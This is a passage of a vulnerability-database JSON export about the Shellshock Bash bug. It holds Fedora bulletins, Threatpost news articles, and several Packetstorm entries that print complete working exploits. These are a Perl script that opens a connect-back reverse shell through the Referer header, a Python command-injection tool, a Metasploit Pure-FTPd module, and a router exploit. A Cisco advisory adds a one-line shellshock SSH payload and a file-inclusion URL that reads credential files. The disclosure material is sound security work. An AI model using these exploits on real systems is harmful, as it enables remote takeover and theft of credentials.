"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-26T09:00:48", "id": "FEDORA:9FE1722338", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3SE3ICTGVKUWQ7F6WCC5HZKCLEX5DAGX/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "description": "The GNU Bourne Again shell (Bash) is a shell or command language interpreter that is compatible with the Bourne shell (sh). Bash incorporates useful features from the Korn shell (ksh) and the C shell (csh). Most sh scripts can be run by bash without modification. ", "cvss3": {}, "published": "2014-10-05T08:13:46", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: bash-4.2.51-2.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7169"], "modified": "2014-10-05T08:13:46", "id": "FEDORA:652DB21498", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ORGSHHQKKEWJCV3U66TC64Q67KKPGIP6/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:58:05", "description": "The urgency to patch systems against the [Bash zero-day vulnerability](<http://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521>) has been cranked to 10 after reports of an exploit in the wild have been made public by [AusCERT](<https://www.auscert.org.au/20652>), the Computer Emergency Response Team of Australia.\n\nThis seems to reflect a similar finding posted by a researcher who goes by the handle Yinette who found a [malware sample](<https://gist.github.com/anonymous/929d622f3b36b00c0be1>) that points to a bot being distributed by the exploit.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/09/07014510/david_jacoby.jpg>)Other researchers, including David Jacoby of Kaspersky Lab, right and podcast below, and Robert Graham of Errata Security also cautioned that the [Bash vulnerability is wormable](<http://blog.erratasec.com/2014/09/bash-shellshock-bug-is-wormable.html#.VCP-0fn-OSo>) and that one is inevitable. Graham, who built an Internet scanner called Masscan, published early results on a search for vulnerable systems that returned 3,000 vulnerable systems on port 80. He said embedded web servers and other services such as DHCP are in real danger.\n\n\u201cEven though my light scan found only 3000 results, this thing is clearly wormable, and can easily worm past firewalls and infect lots of systems,\u201d Graham wrote, adding that he intentionally limited the scope of the scan which included a ping-home command from vulnerable servers to his server.\n\n\u201cOne key question is whether Mac OS X and iPhone DHCP service is vulnerable \u2014 once the worm gets behind a firewall and runs a hostile DHCP server, that would \u2018game over\u2019 for large networks.\u201d\n\nThe exploit reported by Yinette, meanwhile, has a zero detection rate on [VirusTotal](<https://www.virustotal.com/en/file/73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489/analysis/1411634118/>) and has been given the identifier [CVE-2014-6271](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271>). Patches were available yesterday from most of the Linux distributions, but already Red Hat has updated an [advisory](<https://access.redhat.com/articles/1200223>) warning that the patch is incomplete and that specially crafted environment variables will execute arbitrary code. A new identifier, [CVE-2014-7169](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169>), explains this issue in detail. Red Hat said that it will issue a new patch.\n\n* * *\n\n**PODCAST:** Digital Underground \u2013 David Jacoby on the Bash Exploit\n\n<https://media.threatpost.com/wp-content/uploads/sites/103/2014/09/07014512/David-Jacoby-on-the-Bash-Exploit.mp3>\n\n* * *\n\nBash, short for the Bourne again shell, is an embedded command-line shell program present on most Linux, UNIX and Mac OS X systems. The problem presented by this vulnerability is that Bash is quietly accessed by various functions, which makes comprehensive patching a massive challenge. The flaw allows an attacker to remotely attach a malicious executable to a variable that is executed when Bash is invoked.\n\n\u201cIt\u2019s super simple and every version of Bash is vulnerable,\u201d Josh Bressers, manager of Red Hat product security, told Threatpost yesterday. \u201cIt\u2019s extremely serious, but you need very specific conditions in place where a remote user would be able to set that environment variable. Thankfully, it\u2019s not common.\u201d\n\nSome of the more critical instances where the vulnerability may be exposed is on Apache servers for example, using mod_cgi or mod_cgid if either of those scripts is written in Bash. The vulnerability can also be used to bypass ForceCommand in sshd configs, Bressers said. ForceCommand is supposed to limit remote code execution, but exploiting this vulnerability sidesteps that protection. Some Git deployments over SSH would be affected here.\n\nThe bug was discovered by Stephane Chazelas, and it has already drawn comparisons to the Heartbleed OpenSSL bug. Like Heartbleed, the danger isn\u2019t in vulnerable web servers that can be easily found and patched, but in any number of software packages on embedded systems and Internet-facing devices.\n\n\u201cUnlike Heartbleed, which only affected a specific version of OpenSSL, this _bash_ bug has been around for a long, long time,\u201d Graham wrote. \u201cThat means there are _lots_ of old devices on the network vulnerable to this bug. The number of systems needing to be patched, but which won\u2019t be, is much larger than Heartbleed.\u201d\n", "cvss3": {}, "published": "2014-09-25T11:41:51", "type": "threatpost", "title": "Bash Botnet Exploit Found, Bash Patches Incomplete", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-26T16:21:47", "id": "THREATPOST:1DED483898A12D8F4397D8C01339AC63", "href": "https://threatpost.com/bash-exploit-reported-first-round-of-patches-incomplete/108550/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:04", "description": "Much like Heartbleed triggered vendors to issue out of band patches to remedy vulnerabilities that popped up earlier this year, Shellshock, the Bash vulnerability, has forced vendors\u2019 hands in a similar fashion.\n\nVirtualization firm VMware issued a progress report on fixes for four different types of products as they relate to the bug on Monday.\n\nFor the most part the company still has its hands full.\n\nAccording to [yesterday\u2019s security advisory](<http://www.vmware.com/security/advisories/VMSA-2014-0010.html>), it\u2019s currently in the middle of developing a patch for all but one of 38 different virtual appliance products, all of which run on Linux and are shipped with an affected version of Bash.\n\nThat leaves vCenter Log Insight 2.0, a cloud-based analytics platform, as the lone Bash-affected product the company has patched so far. [The company posted](<https://my.vmware.com/web/vmware/details?downloadGroup=STRATA20&productId=412&rPId=5804?src=vmw_so_vex_escho_597>) a download link for the patch file, a .PAK called \u201cUpdate 1,\u201d yesterday.\n\nVMware is also prepping a patch for ESX Hypervisor, one of the company\u2019s many pieces of software that runs virtual machines that has an affected version of the Bash shell. Patches for both 4.0 and 4.1 are forthcoming. The company did not provide a timeframe for the fix but did claim the patch release would be an exception to its existing VMware lifecycle policy.\n\nA variant of ESX, ESXi \u2014 which uses a different kind of shell, Ash, is not vulnerable and neither are any of the company\u2019s Windows-based products.\n\nThe company issued a all-encompassing warning about Bash at the end of its advisory, stressing that any unnamed products that may use the Bash shell as part of its operating system could also be vulnerable.\n\nTo mitigate vulnerabilities its encouraging users to \u201crestrict access to appliances through firewall rules and other network layer controls to only trusted IP addresses\u201d and deploy patches as they become available.\n\nOnce pushed the patches should address the handful of attack vectors \u2013 CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187 \u2013 that attackers have been using to exploit Shellshock.\n\nShellshock, a critical remote code execution vulnerability in Bash, first surfaced [a week ago](<http://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521>) and over the last several days developers have come to grips with how pervasive it may or may not be throughout their systems.\n\n[Apple was quick](<http://threatpost.com/apple-os-x-safe-by-default-against-bash-vulnerability/108586>) to caution users last week that users\u2019 OSX systems were safe by default while [OpenVPN warned yesterday](<http://threatpost.com/openvpn-vulnerable-to-shellshock-bash-vulnerability/108616>) its servers are vulnerable to the threat.\n", "cvss3": {}, "published": "2014-10-01T14:43:47", "type": "threatpost", "title": "VMware Begins to Patch Bash Issues Across Product Line", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2014-10-01T18:43:47", "id": "THREATPOST:F6AE4A5AF20D9E9C8BE6663E8FC80848", "href": "https://threatpost.com/vmware-begins-to-patch-bash-issues-across-product-line/108632/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:41", "description": "", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "packetstorm", "title": "Gnu Bash 4.3 CGI REFERER Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-09-26T00:00:00", "id": "PACKETSTORM:128443", "href": "https://packetstormsecurity.com/files/128443/Gnu-Bash-4.3-CGI-REFERER-Command-Injection.html", "sourceData": "`#!/usr/bin/perl \n# \n# Title: Bash/cgi command execution exploit \n# CVE: CVE-2014-6271 \n# Author: Simo Ben youssef \n# Contact: Simo_at_Morxploit_com \n# Coded: 25 September 2014 \n# Published: 26 September 2014 \n# MorXploit Research \n# http://www.MorXploit.com \n# \n# Description: \n# Perl code to exploit CVE-2014-6271. \n# Injects a Perl connect back shell. \n# \n# Download: \n# http://www.morxploit.com/morxploits/morxbash.pl \n# \n# Requires LWP::UserAgent \n# apt-get install libwww-perl \n# yum install libwww-perl \n# perl -MCPAN -e 'install Bundle::LWP' \n# For SSL support: \n# apt-get install liblwp-protocol-https-perl \n# yum install perl-Crypt-SSLeay \n# \n# Tested on: \n# Apache 2.4.7 / Ubuntu 14.04.1 LTS / Bash 4.3.11(1)-release (x86_64-pc-linux-gnu) \n# \n# Demo: \n# perl morxbash.pl http://localhost cgi-bin/test.cgi 127.0.0.1 1111 \n# \n# =================================================== \n# --- Bash/cgi remote command execution exploit \n# --- By: Simo Ben youssef <simo_at_morxploit_com> \n# --- MorXploit Research www.MorXploit.com \n# =================================================== \n# [*] MorXploiting http://localhost/cgi-bin/test.cgi \n# [+] Sent payload! Waiting for connect back shell ... \n# [+] Et voila you are in! \n# \n# Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux \n# uid=33(www-data) gid=33(www-data) groups=33(www-data) \n# \n# Author disclaimer: \n# The information contained in this entire document is for educational, demonstration and testing purposes only. \n# Author cannot be held responsible for any malicious use or dammage. Use at your own risk. \n# \n \nuse LWP::UserAgent; \nuse IO::Socket; \nuse strict; \n \nsub banner { \nsystem(($^O eq 'MSWin32') ? 'cls' : 'clear'); \nprint \"===================================================\\n\"; \nprint \"--- Bash/cgi remote command execution exploit\\n\"; \nprint \"--- By: Simo Ben youssef <simo_at_morxploit_com>\\n\"; \nprint \"--- MorXploit Research www.MorXploit.com\\n\"; \nprint \"===================================================\\n\"; \n} \n \nif (!defined ($ARGV[0] && $ARGV[1] && $ARGV[2] && $ARGV[3])) { \nbanner(); \nprint \"perl $0 <target> <cgi script path> <connectbackIP> <connectbackport>\\n\"; \nprint \"perl $0 http://localhost cgi-bin/test.cgi 127.0.0.1 31337\\n\"; \nexit; \n} \n \nmy $host = $ARGV[0]; \nmy $dir = $ARGV[1]; \nmy $cbhost = $ARGV[2]; \nmy $cbport = $ARGV[3]; \nmy $other = \"http://localhost:81\"; \n$| = 1; \n$SIG{CHLD} = 'IGNORE'; \n \nmy $l_sock = IO::Socket::INET->new( \nProto => \"tcp\", \nLocalPort => \"$cbport\", \nListen => 1, \nLocalAddr => \"0.0.0.0\", \nReuse => 1, \n) or die \"[-] Could not listen on $cbport: $!\\n\"; \n \nsub randomagent { \nmy @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', \n'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0', \n'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', \n'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', \n'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', \n'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31' \n); \nmy $random = $array[rand @array]; \nreturn($random); \n} \nmy $useragent = randomagent(); \n \nmy $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); \n$ua->timeout(10); \n$ua->agent($useragent); \nmy $status = $ua->get(\"$host/$dir\"); \nunless ($status->is_success) { \nbanner(); \nprint \"[-] Error: \" . $status->status_line . \"\\n\"; \nexit; \n} \n \nbanner(); \nprint \"[*] MorXploiting $host/$dir\\n\"; \n \nmy $payload = \"() { :; }; /bin/bash -c \\\"perl -e '\\\\\\$p=fork;exit,if(\\\\\\$p); use Socket; use FileHandle; my \\\\\\$system = \\\\\\\"/bin/sh\\\\\\\"; my \\\\\\$host = \\\\\\\"$cbhost\\\\\\\"; my \\\\\\$port = \\\\\\\"$cbport\\\\\\\";socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\\\\\\\"tcp\\\\\\\")); connect(SOCKET, sockaddr_in(\\\\\\$port, inet_aton(\\\\\\$host))); SOCKET->autoflush(); open(STDIN, \\\\\\\">&SOCKET\\\\\\\"); open(STDOUT,\\\\\\\">&SOCKET\\\\\\\"); open(STDERR,\\\\\\\">&SOCKET\\\\\\\"); print \\\\\\\"[+] Et voila you are in!\\\\\\\\n\\\\\\\\n\\\\\\\"; system(\\\\\\\"uname -a;id\\\\\\\"); system(\\\\\\$system);'\\\"\"; \nmy $exploit = $ua->get(\"$host/$dir\", Referer => \"$payload\"); \nprint \"[+] Sent payload! Waiting for connect back shell ...\\n\"; \nmy $a_sock = $l_sock->accept(); \n$l_sock->shutdown(SHUT_RDWR); \ncopy_data_bidi($a_sock); \n \nsub copy_data_bidi { \nmy ($socket) = @_; \nmy $child_pid = fork(); \nif (! $child_pid) { \nclose(STDIN); \ncopy_data_mono($socket, *STDOUT); \n$socket->shutdown(SHUT_RD); \nexit(); \n} else { \nclose(STDOUT); \ncopy_data_mono(*STDIN, $socket); \n$socket->shutdown(SHUT_WR); \nkill(\"TERM\", $child_pid); \n} \n} \nsub copy_data_mono { \nmy ($src, $dst) = @_; \nmy $buf; \nwhile (my $read_len = sysread($src, $buf, 4096)) { \nmy $write_len = $read_len; \nwhile ($write_len) { \nmy $written_len = syswrite($dst, $buf); \nreturn unless $written_len; \n$write_len -= $written_len; \n} \n} \n} \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128443/morxbash.pl.txt"}, {"lastseen": "2016-12-05T22:18:53", "description": "", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "packetstorm", "title": "Gnu Bash 4.3 CGI Scan Remote Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-09-26T00:00:00", "id": "PACKETSTORM:128442", "href": "https://packetstormsecurity.com/files/128442/Gnu-Bash-4.3-CGI-Scan-Remote-Command-Injection.html", "sourceData": "`#!/usr/bin/env python \n \n# http connection \nimport urllib2 \n# Args management \nimport optparse \n# Error managemen \nimport sys \n \nbanner = \"\"\" \n_______ _______ __ \n| _ .-----.--.--. | _ .---.-.-----| |--. \n|. |___| | | | |. 1 | _ |__ --| | \n|. | |__|__|_____| |. _ |___._|_____|__|__| \n|: 1 | |: 1 \\ \n|::.. . | |::.. . / \n`-------' `-------' \n___ ___ _______ _______ _______ ___ \n| Y | | _ | | _ | _ | | \n| | |_|___| | |. l |. 1___|. | \n|____ |___(__ | |. _ |. |___|. | \n|: | |: 1 | |: | |: 1 |: | \n|::.| |::.. . | |::.|:. |::.. . |::.| \n`---' `-------' `--- ---`-------`---' \n \nGnu B4sh <= 4.3 Cg1 Sc4n + r3m0t3 C0mm4nd Inj3ct10n \n \n========================================== \n- Release date: 2014-09-25 \n- Discovered by: Stephane Chazelas \n- CVE: 2014-6271 \n=========================================== \n \nWritten by: \n \nClaudio Viviani \n \nhttp://www.homelab.it \n \ninfo@homelab.it \nhomelabit@protonmail.ch \n \nhttps://www.facebook.com/homelabit \nhttps://twitter.com/homelabit \nhttps://plus.google.com/+HomelabIt1/ \nhttps://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww \n\"\"\" \n \n# Check url \ndef checkurl(url): \nif url[:8] != \"https://\" and url[:7] != \"http://\": \nprint('[X] You must insert http:// or https:// procotol') \nsys.exit(1) \nelse: \nreturn url \n \ndef connectionScan(url): \nprint '[+] Checking for vulnerability...' \ntry: \nheaders = {\"VULN\" : \"() { :;}; echo 'H0m3l4b1t: YES'\"} \nresponse = urllib2.Request(url, None, headers) \ncontent = urllib2.urlopen(response) \nif 'H0m3l4b1t' in content.info(): \nprint '[!] VULNERABLE: '+url \nelse: \nprint '[X] NOT Vulnerable' \nexcept urllib2.HTTPError, e: \nprint e.info() \nif e.code == 400: \nprint '[X] Page not found' \nelse: \nprint '[X] HTTP Error' \nexcept urllib2.URLError: \nprint '[X] Connection Error' \n \ndef connectionInje(url,cmd): \ntry: \nheaders = { 'User-Agent' : '() { :;}; /bin/bash -c \"'+cmd+'\"' } \nresponse = urllib2.Request(url, None, headers) \ncontent = urllib2.urlopen(response).read() \nprint '[!] '+cmd+' command sent!' \nexcept urllib2.HTTPError, e: \nif e.code == 500: \nprint '[!] '+cmd+' command sent!!!' \nelse: \nprint '[!] command not sent :(' \nexcept urllib2.URLError: \nprint '[X] Connection Error' \n \ncommandList = optparse.OptionParser('usage: %prog [-s] -t http://localhost/cgi-bin/test -c \"touch /tmp/test.txt\"') \ncommandList.add_option('-t', '--target', action=\"store\", \nhelp=\"Insert TARGET URL: http[s]://www.victim.com[:PORT]\", \n) \ncommandList.add_option('-c', '--cmd', action=\"store\", \nhelp=\"Insert command name\", \n) \ncommandList.add_option('-s', '--scan', default=False, action=\"store_true\", \nhelp=\"Scan Only\", \n) \noptions, remainder = commandList.parse_args() \n \n# Check args \nif not options.target: \nprint(banner) \ncommandList.print_help() \nsys.exit(1) \nelif options.target and not options.cmd and not options.scan: \nprint(banner) \ncommandList.print_help() \nsys.exit(1) \n \nprint(banner) \n \nurl = checkurl(options.target) \ncmd = options.cmd \nif options.scan: \nprint '[+] Scan Only Mode' \nconnectionScan(url) \nelse: \nprint '[+] Remote Command Innection Mode' \nconnectionScan(url) \nconnectionInje(url,cmd) \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128442/gnu_b4sh_43_rci_v2.py.txt"}, {"lastseen": "2016-12-05T22:20:10", "description": "", "cvss3": {}, "published": "2014-10-02T00:00:00", "type": "packetstorm", "title": "Pure-FTPd External Authentication Bash Environment Variable Code Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2014-10-02T00:00:00", "id": "PACKETSTORM:128522", "href": "https://packetstormsecurity.com/files/128522/Pure-FTPd-External-Authentication-Bash-Environment-Variable-Code-Injection.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit4 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::Ftp \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection', \n'Description' => %q( \nThis module exploits the code injection flaw known as shellshock which \nleverages specially crafted environment variables in Bash. This exploit \nspecifically targets Pure-FTPd when configured to use an external \nprogram for authentication. \n), \n'Author' => \n[ \n'Stephane Chazelas', # Vulnerability discovery \n'Frank Denis', # Discovery of Pure-FTPd attack vector \n'Spencer McIntyre' # Metasploit module \n], \n'References' => \n[ \n['CVE', '2014-6271'], \n['OSVDB', '112004'], \n['EDB', '34765'], \n['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc'] \n], \n'Payload' => \n{ \n'DisableNops' => true, \n'Space' => 2048 \n}, \n'Targets' => \n[ \n[ 'Linux x86', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_X86, \n'CmdStagerFlavor' => :printf \n} \n], \n[ 'Linux x86_64', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_X86_64, \n'CmdStagerFlavor' => :printf \n} \n] \n], \n'DefaultOptions' => \n{ \n'PrependFork' => true \n}, \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Sep 24 2014')) \nregister_options( \n[ \nOpt::RPORT(21), \nOptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']) \n], self.class) \nderegister_options('FTPUSER', 'FTPPASS') \nend \n \ndef check \n# this check method tries to use the vulnerability to bypass the login \nusername = rand_text_alphanumeric(rand(20) + 1) \nrandom_id = (rand(100) + 1) \ncommand = \"echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end\" \nif send_command(username, command) =~ /^2\\d\\d ok./i \nreturn CheckCode::Safe if banner !~ /pure-ftpd/i \ndisconnect \n \ncommand = \"echo auth_ok:0; echo end\" \nif send_command(username, command) =~ /^5\\d\\d login authentication failed/i \nreturn CheckCode::Vulnerable \nend \nend \ndisconnect \n \nCheckCode::Safe \nend \n \ndef execute_command(cmd, _opts) \ncmd.gsub!('chmod', \"#{datastore['RPATH']}/chmod\") \nusername = rand_text_alphanumeric(rand(20) + 1) \nsend_command(username, cmd) \nend \n \ndef exploit \n# Cannot use generic/shell_reverse_tcp inside an elf \n# Checking before proceeds \nif generate_payload_exe.blank? \nfail_with(Failure::BadConfig, \"#{peer} - Failed to store payload inside executable, please select a native payload\") \nend \n \nexecute_cmdstager(linemax: 500) \nhandler \nend \n \ndef send_command(username, cmd) \ncmd = \"() { :;}; #{datastore['RPATH']}/sh -c \\\"#{cmd}\\\"\" \nconnect \nsend_user(username) \npassword_result = send_pass(cmd) \ndisconnect \npassword_result \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128522/pureftpd_bash_env_exec.rb.txt"}, {"lastseen": "2018-12-08T02:36:14", "description": "", "cvss3": {}, "published": "2018-12-07T00:00:00", "type": "packetstorm", "title": "FutureNet NXR-G240 Series ShellShock Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2018-12-07T00:00:00", "id": "PACKETSTORM:150687", "href": "https://packetstormsecurity.com/files/150687/FutureNet-NXR-G240-Series-ShellShock-Command-Injection.html", "sourceData": "`# -*- coding: utf-8 -*- \n# Title: FutureNet NXR-G240 Series - \"ShellShock\" Remote Command Injection \n# Date: 2018-06-12 \n# Author: Nassim Asrir \n# You have a Q ? Contact me at: https://www.linkedin.com/in/nassim-asrir-b73a57122/ \n# Vendor: http://www.centurysys.co.jp/ \n# CVE: CVE-2014-6271 \n# Greetz to : Nadia BENCHIKHA for the great help. \n# Example: \n# [root@parrot]a[/home/sniperpex/Desktop] \n# #python ./exploit.py http://server -u admin -p admin -c ps \n \nimport urllib2 \nimport base64 \nimport bs4 \nimport sys \nimport argparse \nreload(sys) \nsys.setdefaultencoding('utf8') \n \nap = argparse.ArgumentParser(description=\"FutureNet NXR-G240 Series - ShellShock Remote Command Injection \") \n \nap.add_argument(\"host\", help=\"(Example: http://127.0.0.1).\") \n \nap.add_argument(\"-u\", \"--user\", help=\"Admin username (Default: admin)\") \n \nap.add_argument(\"-p\", \"--password\", help=\"Admin password (Default: admin)\") \n \nap.add_argument(\"-c\", \"--cmd\", help=\"Command to run.\") \n \nargs = ap.parse_args() \n \nrequest = urllib2.Request(args.host+\"/cgi-bin/information.cgi?section=arp&module=system&command=execute\") \n \nbase64string = base64.encodestring('%s:%s' % (args.user, args.password)).replace('\\n', '') \n \nprint '[+] Authentication & Exploit in progress...' \n \nrequest.add_header(\"Authorization\", \"Basic %s\" % base64string) \n \nrequest.add_header(\"User-Agent\", \"() { :;}; /bin/bash -c \"+str(args.cmd)) \n \nresponse = urllib2.urlopen(request) \n \nsoup = bs4.BeautifulSoup(response, 'html.parser') \n \nfor textarea in soup.find_all('pre'): \n \nprint textarea.get_text().replace(\"# ARPaea +-\",'').replace(\"e!\"c$?oaSSaa3/4aa\",'') \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/150687/futurenetnxrg240-exec.txt"}, {"lastseen": "2016-12-05T22:23:14", "description": "", "cvss3": {}, "published": "2015-08-13T00:00:00", "type": "packetstorm", "title": "Cisco Unified Communications Manager Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2015-08-13T00:00:00", "id": "PACKETSTORM:133070", "href": "https://packetstormsecurity.com/files/133070/Cisco-Unified-Communications-Manager-Command-Execution.html", "sourceData": "`Vantage Point Security Advisory 2015-001 \n======================================== \n \nTitle: Cisco Unified Communications Manager Multiple Vulnerabilities \nVendor: Cisco \nVendor URL: http://www.cisco.com/ \nVersions affected: <9.2, <10.5.2, <11.0.1. \nSeverity: Low to medium \nVendor notified: Yes \nReported: Oct. 2014 \nPublic release: Aug. 13th, 2015 \nAuthor: Bernhard Mueller <bernhard[at]vantagepoint[dot]sg> \n \nSummary: \n-------- \n \nCisco Unified Communications Manager (CUCM) offers services such as session \nmanagement, voice, video, messaging, mobility, and web conferencing. \n \nDuring the last year, Vantage Point Security has reported four security \nissues to Cisco as listed below. \n \n \n1. Shellshock command injection \n-------------------------------- \n \nAuthenticated users of CUCM can access limited functionality via the web \ninterface and Cisco console (SSH on port 22). Because the SSH server is \nconfigured to process several environment variables from the client and a \nvulnerable version of bash is used, it is possible to exploit command \ninjection via specially crafted environment variables (CVE-2014-6271 a.k.a. \nshellshock). This allows an attacker to spawn a shell running as the user \n\"admin\". \n \n \nSeveral environment variables can be used to exploit the issue. Example: \n \n \n$ LC_PAPER=\"() { x;};/bin/sh\" ssh Administrator@examplecucm.com \n \n \n2. Local File Inclusion \n----------------------- \n \nThe application allows users to view the contents of any locally accessible \nfiles on the web server through a vulnerability known as LFI (Local File \nInclusion). LFI vulnerabilities are commonly used to download application \nsource code, configuration files and files containing sensitive information \nsuch as passwords. Exploiting this issue requires a valid user account. \n \n \nhttps://cucm.example.com/:8443/reporter-servlet/GetFileContent?Location=/&FileName=/usr/local/thirdparty/jakarta-tomcat/conf/tomcat-users.xml \n \n \n3. Unauthenticated access to ping command \n----------------------------------------- \n \nThe pingExecute servlet allows unauthenticated users to execute pings to \narbitrary IP addresses. This could be used by an attacker to enumerate the \ninternal network. The following URL triggers a ping of the host 10.0.0.1: \n \nhttps://cucm.example.com:8443/cmplatform/pingExecute?hostname=10.0.0.1&interval=1.0&packetsize=12&count=1000&secure=false \n \n \n4. Magic session ID allows unauthenticated access to SOAP calls \n--------------------------------------------------------------- \n \nAuthentication for some methods in the EPAS SOAP interface can be bypassed \nby using a hardcoded session ID. The methods \"GetUserLoginInfoHandler\" and \n\"GetLoggedinXMPPUserHandler\" are affected. \n \n \nFix Information: \n---------------- \n \nUpgrade to CUCM version 9.2, 10.5.2 or 11.0.1. \n \n \nReferences: \n----------- \n \nhttps://tools.cisco.com/quickview/bug/CSCus88031 \nhttps://tools.cisco.com/quickview/bug/CSCur49414 \nhttps://tools.cisco.com/quickview/bug/CSCum05290 \nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash \nhttp://tools.cisco.com/security/center/viewAlert.x?alertId=37111 \n \n \nTimeline: \n--------- \n \n2014/10: Issues reported to Cisco; \n2015/07: Confirm that all issues have been fixed. \n \n \nAbout Vantage Point Security: \n-------------------- \n \nVantage Point is the leading provider for penetration testing and security \nadvisory services in Singapore. Clients in the Financial, Banking and \nTelecommunications industries select Vantage Point Security based on \ntechnical competency and a proven track record to deliver significant and \nmeasurable improvements in their security posture. \n \nhttps://www.vantagepoint.sg/ \noffice[at]vantagepoint[dot]sg \n \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/133070/cisco-lfiexec.txt"}, {"lastseen": "2016-12-05T22:22:36", "description": "", "cvss3": {}, "published": "2015-12-02T00:00:00", "type": "packetstorm", "title": 